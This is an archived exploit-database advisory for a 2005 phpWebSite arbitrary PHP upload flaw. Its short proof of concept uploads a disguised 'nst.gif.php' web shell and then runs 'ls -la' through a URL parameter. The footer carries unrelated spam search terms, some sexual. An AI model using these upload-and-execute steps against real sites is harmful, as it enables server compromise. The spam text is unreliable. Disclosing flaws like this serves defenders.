about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability


Title PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
Published 2005-02-24-12:00AM
Updated 2005-03-01-11:05PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability is credited to tjomka <tjomka@navigator.lv>.
Vulnerable  phpWebsite phpWebsite 0.10
phpWebsite phpWebsite 0.9.3 4
phpWebsite phpWebsite 0.9.3 3
phpWebsite phpWebsite 0.9.3 2
phpWebsite phpWebsite 0.9.3 1
phpWebsite phpWebsite 0.9.3
phpWebsite phpWebsite 0.8.3
phpWebsite phpWebsite 0.8.2
phpWebsite phpWebsite 0.7.3
Gentoo Linux
Not Vulnerable  
Code   The following example is available:

http://www.example.com/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill all inputs
2. in Image: select nst.gif.php

press Save.

Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 00:02:36 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
gay boy se angelllocz www.dldvb. www.waltai sexsy xxk 2.4.21 37 online ved news for c qdqy.5d6d. Free.Sex.V Www.asian sex imeg news for c www.auto-t Www.z1 sex news for c Mac OS X x wwxxcom news for c www.auto-t Blueapple Xlxx.com. app Film bokep met PHP cURL E free sex v news for C porn thund UW Imap po kerala.com WWW TAMIL Apache 2.0 Xxxxxx WWW.GIRLS. lolita php-nuke 2 auction news for c scary maze www.579151 news for c vulnerabil SHAKEELASE wwwsex@com www.yoetub www.gzhwgg nantharase www.chengs www.taobao